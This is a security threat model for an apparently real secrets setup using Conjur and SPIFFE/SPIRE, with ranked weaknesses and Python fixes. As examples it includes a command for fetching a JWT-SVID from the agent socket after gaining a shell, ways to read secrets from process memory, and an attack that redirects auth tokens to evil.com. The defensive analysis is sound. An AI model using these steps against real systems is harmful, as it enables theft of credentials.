Threat Model

Honest assessment of what’s secure, what’s not, and what to fix.


1. CATCH: Env Var Fallback = Silent Downgrade Attack

The problem: When Conjur is unreachable or doesn’t have a variable, the ConjurBackend silently falls back to os.environ. An attacker who can kill the Conjur connection (network partition, DNS hijack, firewall rule) forces the app to read from env vars — which may be stale, compromised, or attacker-controlled.

# conjur_backend.py line 104-108
env_val = os.environ.get(name)
if env_val is not None:
    logger.debug("secret_env_fallback", name=name)  # debug level, easy to miss
    return env_val

Impact: If an attacker sets env vars on the host (compromised container, malicious sidecar) AND blocks Conjur, the app uses the attacker’s values.

Fix needed: Make the fallback configurable, and run production in fail-closed mode: if Conjur is configured but unreachable, refuse to return the secret instead of falling back. The fallback is currently logged at debug level, which hides it in most production log configurations; it should be logged at warning at minimum.
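A minimal sketch of what fail-closed resolution could look like. This is not the actual ConjurBackend code: `resolve_secret`, `SecretUnavailableError`, and the `fetch_from_conjur` callable are hypothetical names used for illustration, and the sketch assumes `CONJUR_FAIL_CLOSED` is read as a boolean-like string. It also fails closed when Conjur is reachable but has no such variable, which is a stricter choice than the text above requires.

```python
import logging
import os
from typing import Callable, Mapping, Optional

logger = logging.getLogger("secrets")


class SecretUnavailableError(RuntimeError):
    """Raised when Conjur cannot supply a secret and env fallback is disabled."""


def resolve_secret(
    name: str,
    fetch_from_conjur: Callable[[str], Optional[str]],  # hypothetical fetch hook
    environ: Mapping[str, str] = os.environ,
) -> Optional[str]:
    """Return the secret from Conjur; use the env var only if fallback is allowed."""
    fail_closed = environ.get("CONJUR_FAIL_CLOSED", "").lower() in ("1", "true", "yes")

    try:
        value = fetch_from_conjur(name)
        reason = "not_found"
    except Exception:
        value = None
        reason = "conjur_unreachable"

    if value is not None:
        return value

    if fail_closed:
        # Refuse to downgrade: an attacker who blocks Conjur gets an error, not env values.
        raise SecretUnavailableError(f"{name!r} unavailable from Conjur ({reason})")

    # Fallback is allowed, but it is logged at warning so it cannot go unnoticed.
    logger.warning("secret_env_fallback name=%s reason=%s", name, reason)
    return environ.get(name)
```

With `CONJUR_FAIL_CLOSED=true`, a blocked Conjur connection surfaces as an exception at the call site rather than as a silently different secret value.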


2. CATCH: Secrets Live in Process Memory — Unprotected

The problem: Every secret fetched from Conjur sits in a Python dict as a plain str. Python strings are immutable and cannot be zeroed out. They live in memory until garbage collected — which may be never for cached values.

# conjur_backend.py — cache is a plain dict of plain strings
self._cache: dict[str, tuple[str, float]] = {}
# "sk-ant-api03-..." sits in heap memory, readable via:
# - /proc/PID/mem (root)
# - gcore PID (core dump)
# - ptrace (debugger attach)
# - memory forensics after container kill

Impact: Anyone with root on the host (or a container escape exploit) can read all cached secrets from process memory. A core dump (crash, OOM kill) writes them to disk.

Fix needed:

  • Disable core dumps: ulimit -c 0 or prctl(PR_SET_DUMPABLE, 0) at process start.
  • The cache TTL limits the window (secrets expire from cache after 5 min), but during that window they’re in plaintext memory.
  • Python cannot truly zero memory (strings are immutable). For the vault encryption key, crypto.py could use mlock() via ctypes to prevent swap, but this is hard in Python.
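The core-dump part of the fix can be sketched in a few lines of Python, assuming a Linux host. `disable_core_dumps` is a hypothetical helper name; the constant `PR_SET_DUMPABLE = 4` comes from `<linux/prctl.h>`. The `prctl` call is made through `ctypes` and is treated as best-effort.

```python
import ctypes
import resource
import sys

PR_SET_DUMPABLE = 4  # value from <linux/prctl.h>


def disable_core_dumps() -> bool:
    """Set RLIMIT_CORE to 0 and, on Linux, mark the process non-dumpable.

    Returns True if the prctl call succeeded, False if it was skipped or failed.
    """
    # Lowering both the soft and hard limit is always allowed, even unprivileged.
    resource.setrlimit(resource.RLIMIT_CORE, (0, 0))

    if not sys.platform.startswith("linux"):
        return False
    try:
        libc = ctypes.CDLL(None, use_errno=True)
        # A non-dumpable process produces no core file and cannot be
        # ptrace-attached by an unprivileged process.
        return libc.prctl(PR_SET_DUMPABLE, 0, 0, 0, 0) == 0
    except (OSError, AttributeError):
        return False
```

Calling this once at process start, before any secret is fetched, covers the crash and OOM-kill cases. It does not stop root from reading `/proc/PID/mem`.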

3. CATCH: SPIRE Agent Socket = Root of Trust, But Who Guards It?

The problem: The SPIFFE Workload API socket (/tmp/spire-agent/public/api.sock) is the root of trust. Any process that can open this socket can request a JWT-SVID and authenticate to Conjur as TapPass.

# If an attacker gets shell in the same pod or on the same node.
# The Workload API is gRPC over the Unix socket, so any Workload API client
# works; the spire-agent CLI is shown here:
spire-agent api fetch jwt \
    -audience tappass \
    -socketPath /tmp/spire-agent/public/api.sock
# → Gets a valid JWT-SVID → authenticates to Conjur → reads all secrets

Impact: Container escape, compromised sidecar, or same-node lateral movement = full secret access.

Mitigation (SPIRE’s responsibility, not ours):

  • SPIRE Agent performs workload attestation using kernel- and platform-provided attributes (pid, uid, cgroups, K8s pod identity) to verify which workload is requesting the SVID.
  • The socket should be mounted read-only into only the TapPass container (K8s volume mount with specific pod selector).
  • SPIRE registration entries should be tight: only the specific pod service account + namespace + container image hash gets an SVID.

Our responsibility: Document this clearly. TapPass trusts SPIRE — if SPIRE is misconfigured (loose attestation policies), the whole chain falls apart.


The problem: Whoever has the Conjur admin API key can read every secret, modify policies, and impersonate any host. This is true for any centralized secrets manager.

Impact: If the Conjur admin credential is compromised, all secrets are compromised.

Mitigation:

  • Conjur admin should use MFA (CyberArk PAM).
  • Admin API key should be rotated and stored in a break-glass safe.
  • Separation of duty: TapPass’s host/tappass/server identity has read-only access. It cannot modify policies or read secrets outside its policy scope.

5. CATCH: Resolver Auto-Detection Can Be Manipulated

The problem: The resolver checks os.environ.get("CONJUR_APPLIANCE_URL") to decide which backend to use. If an attacker can set this env var (compromised Dockerfile, CI pipeline injection, K8s configmap edit), they can redirect all secret fetches to a malicious Conjur instance.

# resolver.py
if os.environ.get("CONJUR_APPLIANCE_URL"):
    backend = ConjurBackend()  # connects to whatever URL is in the env var

Impact: Attacker sets CONJUR_APPLIANCE_URL=https://evil.com → app sends auth tokens to evil.com → evil.com returns fake secrets → app uses attacker-controlled API keys.

Fix needed: In production, the Conjur URL should be validated against an allowlist or pinned in the deployment config (not just any env var). At minimum, the TLS certificate verification (CONJUR_SSL_CERT_PATH) should be mandatory in production — pinning the CA prevents connecting to a rogue server.
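One way the startup check could look, as a sketch under assumptions: `validate_conjur_config`, `ConjurConfigError`, and the `allowed_hosts` parameter are hypothetical names, and the allowlist is assumed to come from deployment config that is baked into the image rather than from the environment.

```python
import os
from typing import Iterable, Mapping
from urllib.parse import urlsplit


class ConjurConfigError(ValueError):
    """Raised when the Conjur connection settings fail validation."""


def validate_conjur_config(
    environ: Mapping[str, str],
    allowed_hosts: Iterable[str],  # hypothetical: pinned in deployment config
    require_ca: bool = True,
) -> tuple[str, str]:
    """Return (url, ca_path) if the env-provided Conjur settings are acceptable."""
    url = environ.get("CONJUR_APPLIANCE_URL", "")
    parts = urlsplit(url)

    if parts.scheme != "https":
        raise ConjurConfigError("CONJUR_APPLIANCE_URL must use https")

    # Compare the parsed hostname, not a substring of the URL, so that
    # "https://conjur.internal@evil.com" is rejected.
    host = (parts.hostname or "").lower()
    if host not in {h.lower() for h in allowed_hosts}:
        raise ConjurConfigError(f"Conjur host {host!r} is not in the allowlist")

    ca_path = environ.get("CONJUR_SSL_CERT_PATH", "")
    if require_ca and not os.path.isfile(ca_path):
        raise ConjurConfigError("CONJUR_SSL_CERT_PATH must point to a CA bundle")

    return url, ca_path
```

Running this before constructing the backend turns a redirected URL into a startup failure instead of a live connection to an attacker's server.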


The problem: When a secret is rotated in Conjur (e.g., a leaked API key), TapPass continues using the cached old value for up to 5 minutes (the TTL).

Impact: A 5-minute window where a compromised key is still in use, even after rotation.

Mitigation already in place: POST /admin/secrets/invalidate forces immediate cache flush. But this requires someone (or an automated system) to call it.

Fix needed: Conjur can send webhooks on secret rotation. TapPass should auto-register a webhook listener that calls invalidate() automatically — zero human intervention.
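To make the rotation window concrete, here is a minimal TTL cache sketch with an `invalidate()` hook. It is not the ConjurBackend implementation: `TTLSecretCache` and the injectable `clock` are hypothetical, and the sketch assumes the float in each cache tuple is an expiry time. A rotation notification handler would only need to call `invalidate(name)`.

```python
import threading
import time
from typing import Callable, Optional


class TTLSecretCache:
    """Caches secret values for ttl_seconds; invalidate() closes the window early."""

    def __init__(self, ttl_seconds: float = 300.0,
                 clock: Callable[[], float] = time.monotonic) -> None:
        self._ttl = ttl_seconds
        self._clock = clock
        self._lock = threading.Lock()
        self._cache: dict[str, tuple[str, float]] = {}  # name -> (value, expires_at)

    def get(self, name: str, fetch: Callable[[str], str]) -> str:
        with self._lock:
            now = self._clock()
            entry = self._cache.get(name)
            if entry is not None and now < entry[1]:
                return entry[0]  # may be a rotated-out value until expiry
            value = fetch(name)  # fetch happens under the lock, so I/O is serialized
            self._cache[name] = (value, now + self._ttl)
            return value

    def invalidate(self, name: Optional[str] = None) -> None:
        """Drop one entry, or the whole cache when name is None."""
        with self._lock:
            if name is None:
                self._cache.clear()
            else:
                self._cache.pop(name, None)
```

Without the `invalidate()` call, a rotated secret keeps being served until its entry expires. With it, the next `get()` refetches immediately.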


The problem: TapPass authenticates to Conjur via JWT (SPIFFE) over one-way TLS. The Conjur server is verified via its certificate, but Conjur doesn’t verify the TLS client certificate. The authentication is at the application layer (JWT in POST body), not at the transport layer.

With mTLS, even if an attacker intercepts the JWT-SVID, they can’t replay it over a new connection because they don’t hold the private key for the TLS client certificate.

Fix possible: Use the SPIFFE X509-SVID (which TapPass already has from SPIRE) as the TLS client cert when connecting to Conjur. httpx supports cert=(cert_file, key_file). This adds transport-layer authentication on top of JWT application-layer authentication.
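A sketch of the client side, assuming the X509-SVID certificate and key have been written to PEM files. `build_mtls_context` and its path parameters are hypothetical; the sketch builds a standard-library `ssl.SSLContext`, which httpx also accepts through its `verify` argument as an alternative to `cert=(cert_file, key_file)`.

```python
import ssl


def build_mtls_context(ca_path: str, cert_path: str, key_path: str) -> ssl.SSLContext:
    """Build a client TLS context that verifies Conjur and presents the X509-SVID."""
    # Trust only the pinned CA (e.g. the file named by CONJUR_SSL_CERT_PATH);
    # hostname checking and certificate verification stay enabled by default.
    ctx = ssl.create_default_context(cafile=ca_path)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    # Present the SVID as the client certificate for transport-layer authentication.
    ctx.load_cert_chain(certfile=cert_path, keyfile=key_path)
    return ctx


# Hypothetical usage with httpx (paths are placeholders):
#   client = httpx.Client(verify=build_mtls_context(ca, svid_cert, svid_key))
```

Because SVIDs are short-lived, the context would need to be rebuilt whenever SPIRE rotates the certificate. Conjur (or a proxy in front of it) must also be configured to request and verify client certificates for this to add any protection.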


| Layer | Status | Why |
|---|---|---|
| No secrets in code/config/env | | 129 callsites go through protocol. Only Conjur connection coordinates in env (not secrets). |
| Automatic rotation pickup | | TTL cache + invalidation endpoint. No restart needed. |
| Audit trail | | Conjur logs every secret read with host identity, timestamp, result. |
| No static credential for Conjur auth | | SPIFFE JWT-SVID from SPIRE. Auto-rotated every 5 min. No API key in production. |
| SPIFFE identity reuse | | Same SPIRE infrastructure for agent auth AND Conjur auth. Single identity system. |
| Protocol is open | | Backend is swappable. Conjur today, Vault tomorrow. No lock-in. |
| TLS to Conjur | | httpx verifies server cert. Never verify=False. CA pinning via CONJUR_SSL_CERT_PATH. |
| Thread safety | | Single lock protects cache + auth token. All Conjur I/O serialized. |

| # | Issue | Severity | Effort | Fix |
|---|---|---|---|---|
| 1 | Env fallback in production is silent downgrade | High | Small | Add CONJUR_FAIL_CLOSED=true mode. Log fallbacks at warning not debug. |
| 2 | Conjur URL can be redirected via env var | High | Small | Mandatory CONJUR_SSL_CERT_PATH in production. Validate URL against allowlist. |
| 3 | Core dumps contain secrets in memory | Medium | Small | Disable core dumps at process start. Set RLIMIT_CORE=0. |
| 4 | No mTLS to Conjur | Medium | Medium | Use X509-SVID as httpx client cert for Conjur connections. |
| 5 | 5-min rotation gap | Low | Medium | Conjur webhook → auto-invalidate. |
| 6 | SPIRE socket access = root of trust | Low (SPIRE’s job) | N/A | Document attestation requirements. |
| 7 | Memory secrets can’t be zeroed (Python) | Low | N/A | Language limitation. TTL cache limits window. |